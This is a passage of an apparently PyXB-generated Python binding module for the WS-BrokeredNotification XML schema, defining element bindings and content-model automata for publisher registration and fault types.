CreationTime = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'CreationTime'), pyxb.binding.datatypes.dateTime, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 54, 3))
Namespace.addCategoryObject('elementBinding', CreationTime.name().localName(), CreationTime)
# Elements bound to the anonymous complex types defined in this module.
NotificationBrokerRP = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'NotificationBrokerRP'), CTD_ANON, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 56, 3))
Namespace.addCategoryObject('elementBinding', NotificationBrokerRP.name().localName(), NotificationBrokerRP)
PublisherRegistrationRP = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'PublisherRegistrationRP'), CTD_ANON_, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 76, 3))
Namespace.addCategoryObject('elementBinding', PublisherRegistrationRP.name().localName(), PublisherRegistrationRP)
RegisterPublisher = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'RegisterPublisher'), CTD_ANON_2, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 92, 3))
Namespace.addCategoryObject('elementBinding', RegisterPublisher.name().localName(), RegisterPublisher)
RegisterPublisherResponse = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'RegisterPublisherResponse'), CTD_ANON_3, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 113, 3))
Namespace.addCategoryObject('elementBinding', RegisterPublisherResponse.name().localName(), RegisterPublisherResponse)
# Fault elements bound to the named fault types defined in this module.
PublisherRegistrationRejectedFault = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'PublisherRegistrationRejectedFault'), PublisherRegistrationRejectedFaultType, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 132, 3))
Namespace.addCategoryObject('elementBinding', PublisherRegistrationRejectedFault.name().localName(), PublisherRegistrationRejectedFault)
PublisherRegistrationFailedFault = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'PublisherRegistrationFailedFault'), PublisherRegistrationFailedFaultType, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 140, 3))
Namespace.addCategoryObject('elementBinding', PublisherRegistrationFailedFault.name().localName(), PublisherRegistrationFailedFault)
DestroyRegistration = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'DestroyRegistration'), CTD_ANON_4, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 145, 3))
Namespace.addCategoryObject('elementBinding', DestroyRegistration.name().localName(), DestroyRegistration)
DestroyRegistrationResponse = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'DestroyRegistrationResponse'), CTD_ANON_5, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 155, 2))
Namespace.addCategoryObject('elementBinding', DestroyRegistrationResponse.name().localName(), DestroyRegistrationResponse)
ResourceNotDestroyedFault = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ResourceNotDestroyedFault'), ResourceNotDestroyedFaultType, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 170, 2))
Namespace.addCategoryObject('elementBinding', ResourceNotDestroyedFault.name().localName(), ResourceNotDestroyedFault)

# Populate the CTD_ANON element map with its scoped child element declarations
# (drawn from the wsnt, wsrf_br and wstop schemas).
CTD_ANON._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(_Namespace_wsn_b, 'TopicExpression'), pyxb.bundles.wssplat.wsnt.TopicExpressionType, scope=CTD_ANON, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsnt.xsd', 71, 2)))
CTD_ANON._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(_Namespace_wsn_b, 'FixedTopicSet'), pyxb.binding.datatypes.boolean, scope=CTD_ANON, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsnt.xsd', 72, 2), unicode_default='true'))
CTD_ANON._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(_Namespace_wsn_b, 'TopicExpressionDialect'), pyxb.binding.datatypes.anyURI, scope=CTD_ANON, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsnt.xsd', 73, 2)))
CTD_ANON._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'RequiresRegistration'), pyxb.binding.datatypes.boolean, scope=CTD_ANON, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 43, 3)))
CTD_ANON._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(_Namespace_wstop, 'TopicSet'), pyxb.bundles.wssplat.wstop.TopicSetType, scope=CTD_ANON, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wstop.xsd', 133, 2)))
def _BuildAutomaton ():
    """Build and return the FAC content-model automaton for CTD_ANON.

    States correspond to the child elements TopicExpression,
    FixedTopicSet, TopicExpressionDialect, TopicSet and
    RequiresRegistration; counter conditions encode each particle's
    occurrence constraints from the schema.
    """
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton
    del _BuildAutomaton
    import pyxb.utils.fac as fac
    counters = set()
    # cc_0: unbounded repetition (minOccurs=0, maxOccurs=unbounded).
    cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 60, 18))
    counters.add(cc_0)
    # cc_1: optional occurrence (minOccurs=0, maxOccurs=1).
    cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 62, 12))
    counters.add(cc_1)
    # cc_2: unbounded repetition (minOccurs=0, maxOccurs=unbounded).
    cc_2 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 64, 12))
    counters.add(cc_2)
    # cc_3: optional occurrence (minOccurs=0, maxOccurs=1).
    cc_3 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 66, 18))
    counters.add(cc_3)
    states = []
    # st_0: TopicExpression (not an accepting state on its own).
    final_update = None
    symbol = pyxb.binding.content.ElementUse(CTD_ANON._UseForTag(pyxb.namespace.ExpandedName(_Namespace_wsn_b, 'TopicExpression')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 60, 18))
    st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_0)
    # st_1: FixedTopicSet.
    final_update = None
    symbol = pyxb.binding.content.ElementUse(CTD_ANON._UseForTag(pyxb.namespace.ExpandedName(_Namespace_wsn_b, 'FixedTopicSet')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 62, 12))
    st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_1)
    # st_2: TopicExpressionDialect.
    final_update = None
    symbol = pyxb.binding.content.ElementUse(CTD_ANON._UseForTag(pyxb.namespace.ExpandedName(_Namespace_wsn_b, 'TopicExpressionDialect')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 64, 12))
    st_2 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_2)
    # st_3: TopicSet (from the wstop namespace).
    final_update = None
    symbol = pyxb.binding.content.ElementUse(CTD_ANON._UseForTag(pyxb.namespace.ExpandedName(_Namespace_wstop, 'TopicSet')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 66, 18))
    st_3 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_3)
    # st_4: RequiresRegistration (accepting state: empty final_update set).
    final_update = set()
    symbol = pyxb.binding.content.ElementUse(CTD_ANON._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'RequiresRegistration')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 69, 18))
    st_4 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_4)
    # Transitions out of st_0: repeat itself (incrementing cc_0) or advance.
    transitions = []
    transitions.append(fac.Transition(st_0, [
        fac.UpdateInstruction(cc_0, True) ]))
    transitions.append(fac.Transition(st_1, [
        fac.UpdateInstruction(cc_0, False) ]))
    transitions.append(fac.Transition(st_2, [
        fac.UpdateInstruction(cc_0, False) ]))
    transitions.append(fac.Transition(st_3, [
        fac.UpdateInstruction(cc_0, False) ]))
    transitions.append(fac.Transition(st_4, [
        fac.UpdateInstruction(cc_0, False) ]))
    st_0._set_transitionSet(transitions)
    # Transitions out of st_1.
    transitions = []
    transitions.append(fac.Transition(st_1, [
        fac.UpdateInstruction(cc_1, True) ]))
    transitions.append(fac.Transition(st_2, [
        fac.UpdateInstruction(cc_1, False) ]))
    transitions.append(fac.Transition(st_3, [
        fac.UpdateInstruction(cc_1, False) ]))
    transitions.append(fac.Transition(st_4, [
        fac.UpdateInstruction(cc_1, False) ]))
    st_1._set_transitionSet(transitions)
    # Transitions out of st_2.
    transitions = []
    transitions.append(fac.Transition(st_2, [
        fac.UpdateInstruction(cc_2, True) ]))
    transitions.append(fac.Transition(st_3, [
        fac.UpdateInstruction(cc_2, False) ]))
    transitions.append(fac.Transition(st_4, [
        fac.UpdateInstruction(cc_2, False) ]))
    st_2._set_transitionSet(transitions)
    # Transitions out of st_3.
    transitions = []
    transitions.append(fac.Transition(st_3, [
        fac.UpdateInstruction(cc_3, True) ]))
    transitions.append(fac.Transition(st_4, [
        fac.UpdateInstruction(cc_3, False) ]))
    st_3._set_transitionSet(transitions)
    # st_4 is terminal: no outgoing transitions.
    transitions = []
    st_4._set_transitionSet(transitions)
    return fac.Automaton(states, counters, False, containing_state=None)
# Attach the automaton to the binding class (the helper deletes itself).
CTD_ANON._Automaton = _BuildAutomaton()
# Populate the CTD_ANON_ element map with its scoped child element declarations.
CTD_ANON_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'PublisherReference'), pyxb.bundles.wssplat.wsa.EndpointReferenceType, scope=CTD_ANON_, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 46, 3)))
CTD_ANON_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Topic'), pyxb.bundles.wssplat.wsnt.TopicExpressionType, scope=CTD_ANON_, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 50, 3)))
CTD_ANON_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Demand'), pyxb.binding.datatypes.boolean, scope=CTD_ANON_, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 52, 3)))
CTD_ANON_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'CreationTime'), pyxb.binding.datatypes.dateTime, scope=CTD_ANON_, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 54, 3)))

def _BuildAutomaton_ ():
    """Build and return the FAC content-model automaton for CTD_ANON_.

    States correspond to the child elements PublisherReference, Topic,
    Demand and CreationTime; counter conditions encode each particle's
    occurrence constraints from the schema.
    """
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_
    del _BuildAutomaton_
    import pyxb.utils.fac as fac
    counters = set()
    # cc_0: optional occurrence (minOccurs=0, maxOccurs=1).
    cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 79, 18))
    counters.add(cc_0)
    # cc_1: unbounded repetition (minOccurs=0, maxOccurs=unbounded).
    cc_1 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 81, 18))
    counters.add(cc_1)
    # cc_2: optional occurrence (minOccurs=0, maxOccurs=1).
    cc_2 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 85, 18))
    counters.add(cc_2)
    states = []
    # st_0: PublisherReference (not an accepting state on its own).
    final_update = None
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'PublisherReference')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 79, 18))
    st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_0)
    # st_1: Topic.
    final_update = None
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Topic')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 81, 18))
    st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_1)
    # st_2: Demand (accepting state: empty final_update set).
    final_update = set()
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Demand')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 83, 18))
    st_2 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_2)
    # st_3: CreationTime (accepting, with a final update on cc_2).
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_2, False))
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'CreationTime')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 85, 18))
    st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_3)
    # Transitions out of st_0: repeat itself (incrementing cc_0) or advance.
    transitions = []
    transitions.append(fac.Transition(st_0, [
        fac.UpdateInstruction(cc_0, True) ]))
    transitions.append(fac.Transition(st_1, [
        fac.UpdateInstruction(cc_0, False) ]))
    transitions.append(fac.Transition(st_2, [
        fac.UpdateInstruction(cc_0, False) ]))
    st_0._set_transitionSet(transitions)
    # Transitions out of st_1.
    transitions = []
    transitions.append(fac.Transition(st_1, [
        fac.UpdateInstruction(cc_1, True) ]))
    transitions.append(fac.Transition(st_2, [
        fac.UpdateInstruction(cc_1, False) ]))
    st_1._set_transitionSet(transitions)
    # Transitions out of st_2: unconditional advance to st_3.
    transitions = []
    transitions.append(fac.Transition(st_3, [
        ]))
    st_2._set_transitionSet(transitions)
    # Transitions out of st_3: self-loop governed by cc_2.
    transitions = []
    transitions.append(fac.Transition(st_3, [
        fac.UpdateInstruction(cc_2, True) ]))
    st_3._set_transitionSet(transitions)
    return fac.Automaton(states, counters, False, containing_state=None)
# Attach the automaton to the binding class (the helper deletes itself).
CTD_ANON_._Automaton = _BuildAutomaton_()
# Populate the CTD_ANON_2 element map with its scoped child element declarations.
CTD_ANON_2._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'PublisherReference'), pyxb.bundles.wssplat.wsa.EndpointReferenceType, scope=CTD_ANON_2, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 95, 18)))
CTD_ANON_2._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Topic'), pyxb.bundles.wssplat.wsnt.TopicExpressionType, scope=CTD_ANON_2, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 98, 18)))
CTD_ANON_2._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Demand'), pyxb.binding.datatypes.boolean, scope=CTD_ANON_2, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 101, 18), unicode_default='false'))
CTD_ANON_2._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'InitialTerminationTime'), pyxb.binding.datatypes.dateTime, scope=CTD_ANON_2, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 104, 18)))

def _BuildAutomaton_2 ():
    """Build and return the FAC content-model automaton for CTD_ANON_2.

    States correspond to the child elements PublisherReference, Topic,
    Demand, InitialTerminationTime, plus a trailing element wildcard;
    counter conditions encode each particle's occurrence constraints.
    """
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_2
    del _BuildAutomaton_2
    import pyxb.utils.fac as fac
    counters = set()
    # cc_0: optional occurrence (minOccurs=0, maxOccurs=1).
    cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 95, 18))
    counters.add(cc_0)
    # cc_1: unbounded repetition (minOccurs=0, maxOccurs=unbounded).
    cc_1 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 98, 18))
    counters.add(cc_1)
    # cc_2: optional occurrence (minOccurs=0, maxOccurs=1).
    cc_2 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 101, 18))
    counters.add(cc_2)
    # cc_3: optional occurrence (minOccurs=0, maxOccurs=1).
    cc_3 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 104, 18))
    counters.add(cc_3)
    # cc_4: unbounded repetition for the trailing wildcard.
    cc_4 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 107, 18))
    counters.add(cc_4)
    states = []
    # st_0: PublisherReference (accepting, with a final update on cc_0).
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_0, False))
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_2._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'PublisherReference')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 95, 18))
    st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_0)
    # st_1: Topic (accepting, with a final update on cc_1).
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_1, False))
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_2._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Topic')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 98, 18))
    st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_1)
    # st_2: Demand (accepting, with a final update on cc_2).
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_2, False))
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_2._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Demand')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 101, 18))
    st_2 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_2)
    # st_3: InitialTerminationTime (accepting, with a final update on cc_3).
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_3, False))
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_2._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'InitialTerminationTime')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 104, 18))
    st_3 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_3)
    # st_4: lax element wildcard excluding the wsn/br-2 namespace.
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_4, False))
    symbol = pyxb.binding.content.WildcardUse(pyxb.binding.content.Wildcard(process_contents=pyxb.binding.content.Wildcard.PC_lax, namespace_constraint=(pyxb.binding.content.Wildcard.NC_not, 'http://docs.oasis-open.org/wsn/br-2')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 107, 18))
    st_4 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_4)
    # Transitions out of st_0: repeat itself (incrementing cc_0) or advance.
    transitions = []
    transitions.append(fac.Transition(st_0, [
        fac.UpdateInstruction(cc_0, True) ]))
    transitions.append(fac.Transition(st_1, [
        fac.UpdateInstruction(cc_0, False) ]))
    transitions.append(fac.Transition(st_2, [
        fac.UpdateInstruction(cc_0, False) ]))
    transitions.append(fac.Transition(st_3, [
        fac.UpdateInstruction(cc_0, False) ]))
    transitions.append(fac.Transition(st_4, [
        fac.UpdateInstruction(cc_0, False) ]))
    st_0._set_transitionSet(transitions)
    # Transitions out of st_1.
    transitions = []
    transitions.append(fac.Transition(st_1, [
        fac.UpdateInstruction(cc_1, True) ]))
    transitions.append(fac.Transition(st_2, [
        fac.UpdateInstruction(cc_1, False) ]))
    transitions.append(fac.Transition(st_3, [
        fac.UpdateInstruction(cc_1, False) ]))
    transitions.append(fac.Transition(st_4, [
        fac.UpdateInstruction(cc_1, False) ]))
    st_1._set_transitionSet(transitions)
    # Transitions out of st_2.
    transitions = []
    transitions.append(fac.Transition(st_2, [
        fac.UpdateInstruction(cc_2, True) ]))
    transitions.append(fac.Transition(st_3, [
        fac.UpdateInstruction(cc_2, False) ]))
    transitions.append(fac.Transition(st_4, [
        fac.UpdateInstruction(cc_2, False) ]))
    st_2._set_transitionSet(transitions)
    # Transitions out of st_3.
    transitions = []
    transitions.append(fac.Transition(st_3, [
        fac.UpdateInstruction(cc_3, True) ]))
    transitions.append(fac.Transition(st_4, [
        fac.UpdateInstruction(cc_3, False) ]))
    st_3._set_transitionSet(transitions)
    # Transitions out of st_4: self-loop governed by cc_4.
    transitions = []
    transitions.append(fac.Transition(st_4, [
        fac.UpdateInstruction(cc_4, True) ]))
    st_4._set_transitionSet(transitions)
    # Third argument True: the empty content sequence is acceptable.
    return fac.Automaton(states, counters, True, containing_state=None)
# Attach the automaton to the binding class (the helper deletes itself).
CTD_ANON_2._Automaton = _BuildAutomaton_2()
# Populate the CTD_ANON_3 element map with its scoped child element declarations.
CTD_ANON_3._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'PublisherRegistrationReference'), pyxb.bundles.wssplat.wsa.EndpointReferenceType, scope=CTD_ANON_3, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 116, 18)))
CTD_ANON_3._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ConsumerReference'), pyxb.bundles.wssplat.wsa.EndpointReferenceType, scope=CTD_ANON_3, location=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 119, 5)))

def _BuildAutomaton_3 ():
    """Build and return the FAC content-model automaton for CTD_ANON_3.

    States correspond to the child elements
    PublisherRegistrationReference and ConsumerReference; the single
    counter condition encodes the ConsumerReference particle's
    occurrence constraint from the schema.
    """
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_3
    del _BuildAutomaton_3
    import pyxb.utils.fac as fac
    counters = set()
    # cc_0: optional occurrence (minOccurs=0, maxOccurs=1) for ConsumerReference.
    cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 119, 5))
    counters.add(cc_0)
    states = []
    # st_0: PublisherRegistrationReference (accepting state: empty final_update set).
    final_update = set()
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_3._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'PublisherRegistrationReference')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 116, 18))
    st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_0)
    # st_1: ConsumerReference (accepting, with a final update on cc_0).
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_0, False))
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_3._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'ConsumerReference')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 119, 5))
    st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_1)
    # Transitions out of st_0: unconditional advance to st_1.
    transitions = []
    transitions.append(fac.Transition(st_1, [
        ]))
    st_0._set_transitionSet(transitions)
    # Transitions out of st_1: self-loop governed by cc_0.
    transitions = []
    transitions.append(fac.Transition(st_1, [
        fac.UpdateInstruction(cc_0, True) ]))
    st_1._set_transitionSet(transitions)
    return fac.Automaton(states, counters, False, containing_state=None)
# Attach the automaton to the binding class (the helper deletes itself).
CTD_ANON_3._Automaton = _BuildAutomaton_3()
def _BuildAutomaton_4 ():
    """Build the FAC content-model automaton for PublisherRegistrationRejectedFaultType.

    Machine-generated by PyXB from the wsrf_bf schema.  The model is a
    leading run of wildcard elements outside the bf-2 namespace, a
    'Timestamp' element, then optional trailing 'Originator',
    'ErrorCode', 'Description' (repeatable) and 'FaultCause' elements,
    each governed by its own counter condition.
    """
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_4
    del _BuildAutomaton_4
    import pyxb.utils.fac as fac
    counters = set()
    # cc_0: unbounded leading wildcard content (min=0, max=None).
    cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 46, 6))
    counters.add(cc_0)
    # cc_1: 'Originator' occurs at most once.
    cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 50, 6))
    counters.add(cc_1)
    # cc_2: 'ErrorCode' occurs at most once.
